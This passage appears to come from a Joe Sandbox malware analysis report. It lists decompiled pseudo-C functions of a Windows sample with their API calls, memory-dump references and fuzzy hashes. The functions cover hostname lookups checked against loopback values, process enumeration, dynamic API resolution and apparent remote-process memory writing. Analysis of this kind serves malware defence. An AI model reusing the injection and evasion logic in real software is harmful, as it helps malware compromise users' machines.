                          				_v856 = 0;
                          				_v848 = 1;
                          				_v852 = 2;
                          				 *0x6f9ea8(_v868, 0,  &_v856, _t72);
                          				if(0 == 0) {
                          					_t52 =  *_t72;
                          					if(_t52 == 0) {
                          						goto L10;
                          					}
                          					_t54 =  *( *((intOrPtr*)(_t52 + 0x18)) + 4);
                          					if(_t68 == 0) {
                          						_t27 = _t54 - 0x200007f; // -33554559
                          						_t62 = _t27;
                          						asm("rol edx, 0x8");
                          						if(_t62 >= 8) {
                          							L19:
                          							if((_t54 | 0x01000000) == 0xb00007f) {
                          								L22:
                          								_t58 = 1;
                          								goto L23;
                          							}
                          							L20:
                          							_t68 = _t68 + 1;
                          							L11:
                          							_t40 = _v884;
                          							goto L4;
                          						}
                          						asm("bt edx, ecx");
                          						if(_t62 >> 0x18 < 0) {
                          							goto L22;
                          						}
                          						goto L19;
                          					}
                          					_t26 = _t68 - 1; // -1
                          					if(_t26 > 2) {
                          						if(_t54 != 0x600007f) {
                          							goto L10;
                          						}
                          						goto L22;
                          					}
                          					if(_t54 != 0x200007f) {
                          						goto L20;
                          					}
                          					goto L22;
                          				}
                          				L10:
                          				_t68 = _t68 + 1;
                          				if(_t68 > 4) {
                          					goto L23;
                          				}
                          				goto L11;
                          				L23:
                          				_t48 =  *_t72;
                          				if(_t48 != 0) {
                          					 *0x6f9ea4(_t48);
                          				}
                          				_t67 = _v864;
                          				goto L27;
                          			}

                          APIs
                          • WSAStartup.WS2_32(00000202,?), ref: 006E7A80
                          • WSACleanup.WS2_32 ref: 006E7C2E
                            • Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
                            • Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0
                          • FreeAddrInfoW.WS2_32(00000000), ref: 006E7AE4
                          • getaddrinfo.WS2_32(?,00000000,00000002), ref: 006E7B7A
                          • FreeAddrInfoW.WS2_32(00000000), ref: 006E7BF3
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: AddrFreeHeapInfo$AllocateCleanupProcessStartupgetaddrinfo
                          • String ID:
                          • API String ID: 2060111366-0
                          • Opcode ID: c3cd6484451dabdef9e2eb6863c9f6167160f131578dd95155487452b2ed9fb1
                          • Instruction ID: 43cb9deddbb97f01eb447195c2a17a88fc66fbc647949245dbb4c7cc62affe9f
                          • Opcode Fuzzy Hash: c3cd6484451dabdef9e2eb6863c9f6167160f131578dd95155487452b2ed9fb1
                          • Instruction Fuzzy Hash: F951C1B190E3866FE710DF26DC45BABB6EAEF80744F14482CF449C2241E731D905CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E006F0090(void* __eax, intOrPtr* __ecx) {
                          				intOrPtr _t22;
                          				void* _t23;
                          				void* _t26;
                          				WCHAR** _t33;
                          				WCHAR** _t41;
                          				intOrPtr* _t49;
                          				void* _t59;
                          				WCHAR** _t60;
                          				WCHAR** _t61;
                          				WCHAR* _t78;
                          				void* _t79;
                          				intOrPtr* _t80;
                          				void* _t81;
                          				void* _t82;
                          				void* _t83;
                          				void* _t84;
                          				intOrPtr* _t85;
                          				WCHAR** _t87;
                          				WCHAR** _t88;
                          
                          				_t80 = __ecx;
                          				_push( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x18)) + 8)));
                          				_t22 = E006EC720();
                          				if(_t22 == 0) {
                          					return _t22;
                          				}
                          				 *_t85 = _t22;
                          				_t23 = E006E5140(0x10);
                          				_t87 = _t85 + 4;
                          				_t59 = _t23;
                          				E006E91B0(_t23, 4);
                          				 *0x6f9d54(0x6f9bbc);
                          				if( *_t80 == 0) {
                          					L6:
                          					_t26 = E006EC430(_t59);
                          					_t78 =  *_t87;
                          					if(_t26 == 0) {
                          						L11:
                          						 *0x6f9d9c(0x6f9bbc);
                          						E006E1EA0(_t59);
                          						L006F7400(_t59);
                          						_t88 =  &(_t87[1]);
                          						if(E006EC430( *((intOrPtr*)(_t80 + 0x10))) == 0) {
                          							L18:
                          							if(E006EC430( *((intOrPtr*)(_t80 + 0x14))) == 0) {
                          								L25:
                          								return E006E91E0(_t78);
                          							}
                          							_t81 = 0;
                          							do {
                          								_t33 = E006E42F0( *((intOrPtr*)(_t80 + 0x14)), _t81);
                          								_t60 = _t33;
                          								if(lstrcmpiW( *_t33, _t78) == 0) {
                          									E006E91E0( *_t60);
                          									_t88 =  &(_t88[1]);
                          									_t37 = _t60[1];
                          									if(_t60[1] != 0) {
                          										E006E91E0(_t37);
                          										_t88 =  &(_t88[1]);
                          									}
                          									E006ED310( *((intOrPtr*)(_t80 + 0x14)), _t81);
                          									_t18 = _t81 - 1; // -1
                          									_t81 =  !=  ? _t18 : _t81;
                          								}
                          								_t81 = _t81 + 1;
                          							} while (_t81 < E006EC430( *((intOrPtr*)(_t80 + 0x14))));
                          							goto L25;
                          						}
                          						_t82 = 0;
                          						do {
                          							_t41 = E006E42F0( *((intOrPtr*)(_t80 + 0x10)), _t82);
                          							_t61 = _t41;
                          							if(lstrcmpiW( *_t41, _t78) == 0) {
                          								_t44 = _t61[1];
                          								if(_t61[1] != 0) {
                          									E006E91E0(_t44);
                          									_t88 =  &(_t88[1]);
                          								}
                          								E006E91E0( *_t61);
                          								_t88 =  &(_t88[1]);
                          								E006ED310( *((intOrPtr*)(_t80 + 0x10)), _t82);
                          								_t12 = _t82 - 1; // -1
                          								_t82 =  !=  ? _t12 : _t82;
                          							}
                          							_t82 = _t82 + 1;
                          						} while (_t82 < E006EC430( *((intOrPtr*)(_t80 + 0x10))));
                          						goto L18;
                          					}
                          					_t83 = 0;
                          					do {
                          						_t49 = E006E42F0(_t59, _t83);
                          						_t50 =  *_t49;
                          						if( *_t49 != 0) {
                          							E006ED6B0(_t80, _t50, 0, _t87[7]);
                          						}
                          						_t83 = _t83 + 1;
                          					} while (_t83 < E006EC430(_t59));
                          					goto L11;
                          				}
                          				_t84 = 0;
                          				_t79 = 0;
                          				do {
                          					if(lstrcmpiW( *( *((intOrPtr*)( *((intOrPtr*)(_t80 + 4)) + _t84)) + 8),  *_t87) == 0) {
                          						E006E1200(_t59,  *((intOrPtr*)(_t80 + 4)) + _t84);
                          					}
                          					_t79 = _t79 + 1;
                          					_t84 = _t84 + 4;
                          				} while (_t79 <  *_t80);
                          				goto L6;
                          			}

                          APIs
                          • RtlEnterCriticalSection.NTDLL(006F9BBC), ref: 006F00C8
                          • lstrcmpiW.KERNEL32(?,?,?,00000000,00000000,?,00000000,006ECB66), ref: 006F00E3
                          • RtlLeaveCriticalSection.NTDLL(006F9BBC), ref: 006F013F
                          • lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,00000000,006ECB66), ref: 006F0171
                          • lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,00000000,006ECB66), ref: 006F01CF
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: lstrcmpi$CriticalSection$EnterLeave
                          • String ID:
                          • API String ID: 3699066220-0
                          • Opcode ID: 082c104db46bea8e6874194044c9ef171d561a63f04bb19688a6c5ad808d88ce
                          • Instruction ID: 9998fe833f2c9abf1e408d60621299d10eb9de84e734846dd25b63d0c4554325
                          • Opcode Fuzzy Hash: 082c104db46bea8e6874194044c9ef171d561a63f04bb19688a6c5ad808d88ce
                          • Instruction Fuzzy Hash: CE4192703053489FEBA0BFB6DC59A7B76EB9F80744B04042CFA4686253EE61ED05C665
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E006F5320(void* __ecx, void* __eflags) {
                          				void* _t38;
                          				intOrPtr _t39;
                          				signed int _t40;
                          				void* _t41;
                          				void* _t42;
                          				void* _t54;
                          				void* _t57;
                          				void* _t58;
                          				void* _t63;
                          				intOrPtr* _t69;
                          				intOrPtr _t70;
                          				void* _t72;
                          				void* _t76;
                          				signed int* _t77;
                          				void* _t78;
                          				intOrPtr* _t79;
                          
                          				_t76 = __ecx;
                          				E006F7C90( *((intOrPtr*)(__ecx + 0x60)),  *((intOrPtr*)(__ecx + 0x64)));
                          				_t79 = _t78 + 8;
                          				_t38 =  *(_t76 + 0x5c);
                          				if(_t38 != 0) {
                          					_t69 = _t79 + 4;
                          					 *_t69 = 0;
                          					_push(0);
                          					_push(0);
                          					_push(_t38);
                          					_push(_t69);
                          					_push(3);
                          					_push( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x60)) +  *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x60)) + 0x3c)) + 0x28)) + _t38);
                          					_push(_t76);
                          					E006F3FA0();
                          					_t79 = _t79 + 0x1c;
                          				}
                          				if( *((intOrPtr*)(_t76 + 0x7c)) == 0 || E006F3DF0(_t76) != 0) {
                          					_t70 =  *((intOrPtr*)(_t76 + 0x60));
                          					_t39 =  *((intOrPtr*)(_t70 + 0x3c));
                          					 *_t79 = _t39;
                          					_t40 =  *(_t70 + _t39 + 6) & 0x0000ffff;
                          					if(_t40 == 0) {
                          						L9:
                          						_t57 =  *(_t76 + 0x5c);
                          						_t41 =  *(_t76 + 0x70);
                          						if(_t57 != 0) {
                          							VirtualFreeEx(_t41, _t57, 0, 0x8000);
                          							_t58 =  *(_t76 + 0x5c);
                          							_t41 =  *(_t76 + 0x70);
                          							if(_t58 != 0) {
                          								VirtualFreeEx(_t41, _t58,  *(_t70 +  *((intOrPtr*)(_t79 + 4)) + 0x50), 0x4000);
                          								_t41 =  *(_t76 + 0x70);
                          							}
                          						}
                          						if(_t41 != 0) {
                          							CloseHandle(_t41);
                          							 *(_t76 + 0x70) = 0;
                          						}
                          						_t42 =  *(_t76 + 0x74);
                          						if(_t42 != 0) {
                          							CloseHandle(_t42);
                          							 *(_t76 + 0x74) = 0;
                          						}
                          						_t72 = 1;
                          						 *((intOrPtr*)(_t76 + 0x80)) = 0;
                          						 *((intOrPtr*)(_t76 + 0x44)) = 0;
                          						goto L18;
                          					}
                          					_t54 = 0;
                          					_t77 = _t70 + ( *(_t70 +  *_t79 + 0x14) & 0x0000ffff) +  *_t79 + 0x24;
                          					do {
                          						_t63 =  *(_t76 + 0x5c) + ( *_t77 << 2);
                          						if(_t63 != 0) {
                          							VirtualFreeEx( *(_t76 + 0x70), _t63, 0, 0x8000);
                          							_t40 =  *(_t70 +  *_t79 + 6) & 0x0000ffff;
                          						}
                          						_t54 = _t54 + 1;
                          						_t77 =  &(_t77[0xa]);
                          					} while (_t54 < (_t40 & 0x0000ffff));
                          					goto L9;
                          				} else {
                          					_t72 = 0;
                          					L18:
                          					E006F7C90( *((intOrPtr*)(_t76 + 0x60)),  *((intOrPtr*)(_t76 + 0x64)));
                          					return _t72;
                          				}
                          			}

                          APIs
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000,?,?,?,006ED839), ref: 006F53B0
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000,?,?,?,006ED839), ref: 006F53DC
                          • VirtualFreeEx.KERNEL32(?,?,?,00004000,?,?,?,006ED839), ref: 006F53FB
                          • CloseHandle.KERNEL32(?), ref: 006F5409
                          • CloseHandle.KERNEL32(?), ref: 006F541E
                            • Part of subcall function 006F3FA0: ReadProcessMemory.KERNEL32(?,?,?,00000070), ref: 006F3FCD
                            • Part of subcall function 006F3FA0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 006F4070
                            • Part of subcall function 006F3FA0: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,00003000,00000040), ref: 006F4095
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
• Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
• Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Virtual$Free$CloseHandleMemoryProcess$AllocReadWrite
                          • String ID:
                          • API String ID: 1889406058-0
                          • Opcode ID: bfae0116a3fce751374b7469f787acdf21827a7c9118b030ff369515cb1a0e88
                          • Instruction ID: 9a71b4c3a52593140babc6569a454c368fc86ff8f16f84927a2a4b2ccd9d53fd
                          • Opcode Fuzzy Hash: bfae0116a3fce751374b7469f787acdf21827a7c9118b030ff369515cb1a0e88
                          • Instruction Fuzzy Hash: D6416675600B05ABD7259F29DC89B7AB7E6FF44705F04491DEA8286790EB70F811CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 91%
                          			E006F5630(void* __eax, void* __ecx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                          				long _v20;
                          				void* _t9;
                          				long _t13;
                          				void* _t15;
                          				void* _t19;
                          				signed int _t20;
                          				void* _t24;
                          				void* _t26;
                          				long _t27;
                          				DWORD* _t29;
                          
                          				_t20 = 0;
                          				_v20 = 0;
                          				_t9 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                          				_t26 = _t9;
                          				if(_t9 == 0xffffffff) {
                          					_t24 = 0;
                          					goto L7;
                          				} else {
                          					_t20 = 0;
                          					_t13 = SetFilePointer(_t26, 0, 0, 2);
                          					_t27 = _t13;
                          					_v20 = _t13;
                          					SetFilePointer(_t26, 0, 0, 0);
                          					_t15 = E006E3180(_t27, 0);
                          					_t29 =  &(_t29[2]);
                          					_t24 = _t15;
                          					if(_t15 != 0 && ReadFile(_t26, _t24, _t27, _t29, 0) != 0) {
                          						E006F7C90(_t24, _v20);
                          						_push(_a12);
                          						_push(_a8);
                          						_t19 = E006F4830(_t24, _v20);
                          						_t29 =  &(_t29[6]);
                          						_t20 = 0 | _t19 != 0x00000000;
                          					}
                          					if(_t26 != 0) {
                          						L7:
                          						CloseHandle(_t26);
                          					} else {
                          					}
                          				}
                          				if(_t24 != 0) {
                          					E006E91E0(_t24);
                          					_t29 =  &(_t29[1]);
                          				}
                          				return _t20;
                          			}

                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006F564F
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 006F5669
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 006F5674
                            • Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
                            • Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006F568E
                          • CloseHandle.KERNEL32(00000000), ref: 006F56CB
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
• Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
• Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: File$HeapPointer$AllocateCloseCreateHandleProcessRead
                          • String ID:
                          • API String ID: 2919383809-0
                          • Opcode ID: 489c83a1c4330c2e239d559c696f30b690fc2624dfe2093c224eff41fbd99b43
                          • Instruction ID: c8188337f71afc2ae1dc694a285ee8545137c77eabc72df3fc17278e4c334516
                          • Opcode Fuzzy Hash: 489c83a1c4330c2e239d559c696f30b690fc2624dfe2093c224eff41fbd99b43
                          • Instruction Fuzzy Hash: 951104B120070D7FE3212A256CC9F7B399EDF85399F15042CFB55D6261EA619D018672
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E006F7BE0(void* __eax, WCHAR* _a4, void** _a8, long* _a12) {
                          				void* _t7;
                          				long _t8;
                          				long _t10;
                          				void* _t13;
                          				void* _t17;
                          				void* _t21;
                          				void* _t22;
                          				long* _t23;
                          				long _t24;
                          				DWORD* _t25;
                          
                          				_t23 = _a12;
                          				_t22 = 0;
                          				 *_t25 = 0;
                          				_t7 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                          				if(_t7 == 0xffffffff) {
                          					_t8 = 0;
                          					_t17 = 0;
                          				} else {
                          					_t21 = _t7;
                          					_t22 = 0;
                          					_t10 = SetFilePointer(_t7, 0, 0, 2);
                          					_t24 = _t10;
                          					 *_t25 = _t10;
                          					SetFilePointer(_t21, 0, 0, 0);
                          					_t17 = 1;
                          					if(_t24 != 0) {
                          						_t13 = E006E3180(_t24, 0);
                          						_t25 =  &(_t25[2]);
                          						if(_t13 == 0) {
                          							L5:
                          							_t22 = 0;
                          							_t17 = 0;
                          						} else {
                          							_t22 = _t13;
                          							if(ReadFile(_t21, _t22, _t24, _t25, 0) == 0) {
                          								E006E91E0(_t22);
                          								_t25 =  &(_t25[1]);
                          								 *_t25 = 0;
                          								goto L5;
                          							}
                          						}
                          					}
                          					_t23 = _a12;
                          					CloseHandle(_t21);
                          					_t8 =  *_t25;
                          				}
                          				 *_a8 = _t22;
                          				 *_t23 = _t8;
                          				return _t17;
                          			}

                          APIs
                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006F7C03
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?), ref: 006F7C1D
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 006F7C28
                          • CloseHandle.KERNEL32(00000000), ref: 006F7C6D
                            • Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
                            • Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006F7C4A
                            • Part of subcall function 006E91E0: RtlFreeHeap.NTDLL(00000008,?,006E9F64), ref: 006E91F1
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
• Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
• Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: File$Heap$Pointer$AllocateCloseCreateFreeHandleProcessRead
                          • String ID:
                          • API String ID: 1200625078-0
                          • Opcode ID: 709288b1e0c8ca07a6255e8376963c5f63b0dbd851181e5ae832ef2fca08123c
                          • Instruction ID: 7b7820c08cc9ac0da054f78d64f1d5195c016ae9f7555cd8aec90f312bfcd333
                          • Opcode Fuzzy Hash: 709288b1e0c8ca07a6255e8376963c5f63b0dbd851181e5ae832ef2fca08123c
                          • Instruction Fuzzy Hash: 7D115E712053246FD3209E669C89FBB7EEDEF467A4F11052CFA48D6280D6649905C6B1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E006EC440() {
                          				WCHAR* _v4;
                          				char _v1048;
                          				char _v1568;
                          				intOrPtr _v1596;
                          				void* _t14;
                          				struct tagPROCESSENTRY32W* _t16;
                          				signed int _t26;
                          				void* _t27;
                          				int _t31;
                          				WCHAR* _t32;
                          				struct tagPROCESSENTRY32W _t33;
                          				void* _t40;
                          
                          				_t14 = CreateToolhelp32Snapshot(2, 0);
                          				if(_t14 == 0xffffffff) {
                          					_t31 = 0;
                          					L9:
                          					return _t31;
                          				}
                          				_t27 = _t14;
                          				_t16 = _t33;
                          				 *_t16 = 0x22c;
                          				Process32FirstW(_t27, _t16);
                          				_t26 = 0;
                          				if(_t16 == 0) {
                          					L6:
                          					CloseHandle(_t27);
                          					_t31 = 0;
                          					if(_t26 > 0) {
                          						_t31 = E006E3180(4 + _t26 * 4, 0);
                          						E006EC400(_t31,  &_v1048, _t26 * 4);
                          						 *((intOrPtr*)(_t31 + _t26 * 4)) = 0;
                          					}
                          					goto L9;
                          				}
                          				_t26 = 0;
                          				_t32 =  &_v1568;
                          				do {
                          					if(lstrcmpW(_v4, _t32) != 0) {
                          						goto L5;
                          					}
                          					_t40 = _t26 - 0xfd;
                          					 *((intOrPtr*)(_t33 + 0x22c + _t26 * 4)) = _v1596;
                          					_t26 = _t26 + 1;
                          					if(_t40 > 0) {
                          						goto L6;
                          					}
                          					L5:
                          				} while (Process32NextW(_t27, _t33) != 0);
                          				goto L6;
                          			}

                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006EC44E
                          • Process32FirstW.KERNEL32(00000000), ref: 006EC469
                          • lstrcmpW.KERNEL32(?,?), ref: 006EC48C
                          • Process32NextW.KERNEL32(00000000), ref: 006EC4AC
                          • CloseHandle.KERNEL32(00000000), ref: 006EC4B7
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
• Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
• Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmp
                          • String ID:
                          • API String ID: 2964220450-0
                          • Opcode ID: 216bc93d76a0071634eb5ffd9b423d017ea3acdb270946be24aebeed4e5e8d65
                          • Instruction ID: e4a374bfe6f2078f1e719901b86b97cbe7698a549f446088ed144f3d4a277c3a
                          • Opcode Fuzzy Hash: 216bc93d76a0071634eb5ffd9b423d017ea3acdb270946be24aebeed4e5e8d65
                          • Instruction Fuzzy Hash: 6C11B971201384ABD3215F7AEC89BBF3AEFDB85764F100139F908D62A1E6259815C761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E006F18C0(signed int __ecx, void* __eflags) {
                          				char _v524;
                          				struct HINSTANCE__* _t7;
                          				signed int _t8;
                          				signed int _t20;
                          				CHAR* _t22;
                          				WCHAR* _t23;
                          				struct HINSTANCE__* _t24;
                          				void* _t25;
                          				CHAR* _t26;
                          
                          				_t20 = __ecx;
                          				_t23 =  &_v524;
                          				E006F4520(_t23, 0x41);
                          				_t26 = _t25 + 8;
                          				_t7 = LoadLibraryW(_t23);
                          				_t24 = _t7;
                          				if(_t7 == 0) {
                          					_t8 =  *0x6f9c00; // 0x73e71f81
                          				} else {
                          					_t22 = _t26;
                          					E006F7160(_t22, 0x42);
                          					 *0x6f9c4c = GetProcAddress(_t24, _t22);
                          					E006F7160(_t22, 0x43);
                          					 *0x6f9be8 = GetProcAddress(_t24, _t22);
                          					E006F7160(_t22, 0x44);
                          					 *0x6f9b80 = GetProcAddress(_t24, _t22);
                          					E006F7160(_t22, 0x45);
                          					_t8 = GetProcAddress(_t24, _t22);
                          					 *0x6f9c00 = _t8;
                          				}
                          				return (_t8 & 0xffffff00 | _t8 != 0x00000000) & (_t20 & 0xffffff00 | _t24 != 0x00000000) & 0x000000ff;
                          			}

                          APIs
                          • LoadLibraryW.KERNEL32(?), ref: 006F18DC
                          • GetProcAddress.KERNEL32(00000000), ref: 006F18FD
                          • GetProcAddress.KERNEL32(00000000), ref: 006F1911
                          • GetProcAddress.KERNEL32(00000000), ref: 006F1925
                          • GetProcAddress.KERNEL32(00000000), ref: 006F1939
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
• Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
• Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID:
                          • API String ID: 2238633743-0
                          • Opcode ID: 48437c20bfa14282d3a61321f637a54bcbb1c22c030d1d8826baed652006ac8a
                          • Instruction ID: ffdcc4305e91678586e7bf98f9917c42535e68cecacd5866e42794e812ccbb9b
                          • Opcode Fuzzy Hash: 48437c20bfa14282d3a61321f637a54bcbb1c22c030d1d8826baed652006ac8a
                          • Instruction Fuzzy Hash: 7801DDB190151477D322A7217C46FBF35ADBF97701F050018FB08D6291EB184705C6FA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E006F5C10(void* __ecx, void* __eflags) {
                          				void* _t18;
                          				void* _t20;
                          				void* _t21;
                          				int _t24;
                          				void* _t32;
                          
                          				_t32 = __ecx;
                          				if(E006E1F50(_t18, __ecx) != 0) {
                          					E006EDCC0(__ecx,  *((intOrPtr*)(__ecx + 0x44)));
                          				}
                          				_t20 =  *(_t32 + 0x70);
                          				if(_t20 != 0) {
                          					CloseHandle(_t20);
                          					 *(_t32 + 0x70) = 0;
                          				}
                          				_t21 =  *(_t32 + 0x74);
                          				if(_t21 != 0) {
                          					CloseHandle(_t21);
                          					 *(_t32 + 0x74) = 0;
                          				}
                          				 *((intOrPtr*)(_t32 + 0x80)) = 0;
                          				 *((intOrPtr*)(_t32 + 0x44)) = 0;
                          				 *((intOrPtr*)(_t32 + 0x94)) = 0;
                          				 *((intOrPtr*)(_t32 + 0x98)) = 0;
                          				 *((intOrPtr*)(_t32 + 0x7c)) = 0;
                          				 *((intOrPtr*)(_t32 + 0x78)) = 0;
                          				CloseHandle( *(_t32 + 0x88));
                          				 *(_t32 + 0x88) = 0;
                          				CloseHandle( *(_t32 + 0x8c));
                          				 *(_t32 + 0x8c) = 0;
                          				_t24 = CloseHandle( *(_t32 + 0x90));
                          				 *(_t32 + 0x90) = 0;
                          				return _t24;
                          			}

                          APIs
                            • Part of subcall function 006E1F50: GetExitCodeThread.KERNEL32(?,?,?,?,006E391B), ref: 006E1F6A
                          • CloseHandle.KERNEL32(?), ref: 006F5C30
                          • CloseHandle.KERNEL32(?), ref: 006F5C45
                          • CloseHandle.KERNEL32(?), ref: 006F5C7B
                          • CloseHandle.KERNEL32(?), ref: 006F5C89
                          • CloseHandle.KERNEL32(?), ref: 006F5C97
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: CloseHandle$CodeExitThread
                          • String ID:
                          • API String ID: 1430014291-0
                          • Opcode ID: 177d15090ac1c2dd22a9481651a629274e8492a079f642c5dc41aaaf983f5d4d
                          • Instruction ID: 1778d2231b92216188f8e18a2ebeda452a4f9230dff66d6b781e4569fdb35ef1
                          • Opcode Fuzzy Hash: 177d15090ac1c2dd22a9481651a629274e8492a079f642c5dc41aaaf983f5d4d
                          • Instruction Fuzzy Hash: 5D019770500B409BD7319F36D944B57FEE9FF94740F40881E92AAC2660CB71A804DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 57%
                          			E006F0300(intOrPtr* __ecx, void* __edx) {
                          				void* _t14;
                          				void* _t28;
                          				signed int _t30;
                          				void* _t33;
                          				signed int _t34;
                          				void* _t35;
                          				intOrPtr* _t37;
                          				signed int _t38;
                          				intOrPtr* _t39;
                          				void* _t40;
                          				signed int* _t41;
                          
                          				_t33 = __edx;
                          				_t34 = 0;
                          				_t37 = __ecx;
                          				 *_t39 = 0;
                          				 *0x6f9d54(0x6f9bbc);
                          				_t43 =  *__ecx;
                          				if( *__ecx != 0) {
                          					while(1) {
                          						_t1 = _t37 + 4; // 0x0
                          						if(E006F5020( *((intOrPtr*)( *_t1 + _t34 * 4)), _t43, 0) == 0) {
                          							break;
                          						}
                          						_t34 = _t34 + 1;
                          						if(_t34 <  *_t37) {
                          							continue;
                          						}
                          						goto L3;
                          					}
                          					 *0x6f9d9c(0x6f9bbc);
                          					__eflags = 0;
                          					return 0;
                          				}
                          				L3:
                          				 *0x6f9d9c(0x6f9bbc);
                          				_t35 = _t39 + 4;
                          				E006F4520(_t35, 0x24);
                          				_t40 = _t39 + 8;
                          				_push(_t40);
                          				_push(_t35);
                          				_t14 = E006ED4B0();
                          				_t41 = _t40 + 8;
                          				_t28 = _t14;
                          				if(_t28 != 0) {
                          					_t30 =  *_t41;
